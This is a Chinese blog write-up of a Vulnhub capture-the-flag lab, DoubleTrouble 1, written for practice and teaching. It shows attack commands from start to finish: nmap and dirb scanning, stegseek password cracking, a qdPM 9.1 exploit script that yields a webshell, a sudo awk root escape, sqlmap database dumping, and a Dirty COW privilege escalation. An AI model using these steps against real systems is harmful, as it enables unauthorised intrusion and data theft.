【Vulnhub靶场】DOUBLETROUBLE: 1 通关writeup

本文详述了一次针对Vulnhub靶场DoubleTrouble 1的渗透测试过程,包括环境准备、信息搜集、漏洞利用和权限提升。通过扫描发现靶机开放22、80端口,利用stegseek破解图片获取登录密码,成功登陆后发现CMS为qdPM9.1并利用exploit-db上的脚本获取webshell。通过awk命令无密码执行,升级权限至root,但未找到flag。接着,作者进行第二个靶机的渗透,利用sqlmap获取账号密码,通过SSH登录并利用脏牛漏洞提权,最终获取所有flag。
摘要由CSDN通过智能技术生成


环境准备

靶机地址:https://www.vulnhub.com/entry/doubletrouble-1,743/

kali攻击机ip:192.168.220.128
靶机 ip:

靶机地址:
使用命令:

arp-scan -l   

探测发现是:192.168.220.130

信息搜集

nmap -T4 -p- -A 192.168.220.130 

发现开放22、80端口,打开80端口,发现是一个登录口,弱口令爆破无果,扫目录试试。
在这里插入图片描述

dirb http://192.168.220.130/

找了扫出来的目录,在secret下面有个图片,看起来有点奇怪。
在这里插入图片描述
使用exiftool查看图片的详细信息,没有什么发现。不排除隐写的可能,使用stegseek来破解图片。stegseek的github网址:https://github.com/RickdeJager/stegseek。
字典使用kali自带的rockyou.txt。

apt install ./stegseek_0.6-1.deb
stegseek ./doubletrouble.jpg /usr/share/wordlists/rockyou.txt
cat doubletrouble.jpg.out

在这里插入图片描述
拿到密码后直接登录就完事了。

漏洞利用

登陆后收集到cms是qdPM9.1 ,github搜一下历史漏洞,没啥发现,expdb搜一下,找到了这个 https://www.exploit-db.com/exploits/50175
在这里插入图片描述
下载好执行脚本,发现报错了,打开看一下 是有些换行不对,把换行不对的地方改一下,成功运行。

python3 50175.py -url http://192.168.220.130/ -u otisrush@localhost.com -p otis666 

成功拿webshell,下一步看下反弹个nc把,一直没成功。自己上传个shell算了。burp抓包,在修改个人信息的地方,修改后缀直接上传成功。然后监听,并获取到一个shell。

shell 生成网站  https://www.revshells.com/  使用PHP pentestmonkey

在这里插入图片描述
在这里插入图片描述

权限提升

查看一下当前的权限列表,发现是有一个awk,可以无密码执行

http://192.168.220.130//uploads/users/795484-backdoor.php?cmd=sudo%20-l

sudo awk 'BEGIN {system("/bin/sh")}'

https://gtfobins.github.io/gtfobins/awk/

执行命令 ,成功获得root。然而并没有得到flag,反而是给了一个镜像,下载一波试试。
在这里插入图片描述

python3 -m http.server 9000
本机浏览器直接下载打开 http://192.168.220.130:9000/

第二个靶机

环境准备

kali攻击机ip:192.168.220.128

靶机地址:
使用命令:

arp-scan -l   

探测发现是:192.168.220.131

信息搜集

nmap -T4 -p- -A 192.168.220.131

只有22和80端口开放,80端口是个登录框。照例爆破一波,没有弱口令。登录处用sqlmap跑一下,登陆包抓取后放txt。

在这里插入图片描述

sqlmap -r 1.txt --batch  
sqlmap -r 1.txt --batch --current-db   //当前数据库
sqlmap -r 1.txt --batch -D doubletrouble --tables //枚举该库的表
sqlmap -r 1.txt --batch -T users --dump //枚举该表的数据

在这里插入图片描述
拿到两个账号,密码,分别登录web和ssh试试。
在这里插入图片描述
web登陆不了,ssh只有一个登录成功,拿到第一个flag
在这里插入图片描述
查看系统版本,该版本的提权可以使用脏牛漏洞。下载编译执行后可以成功获取最后一个flag。

uname -a 
vi dirty.c
gcc -pthread dirty.c -o dirty -lcrypt
./dirty
输入密码,然后切换到新的账号
su firefart

dirty.c

//
// This exploit uses the pokemon exploit of the dirtycow vulnerability
// as a ba
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值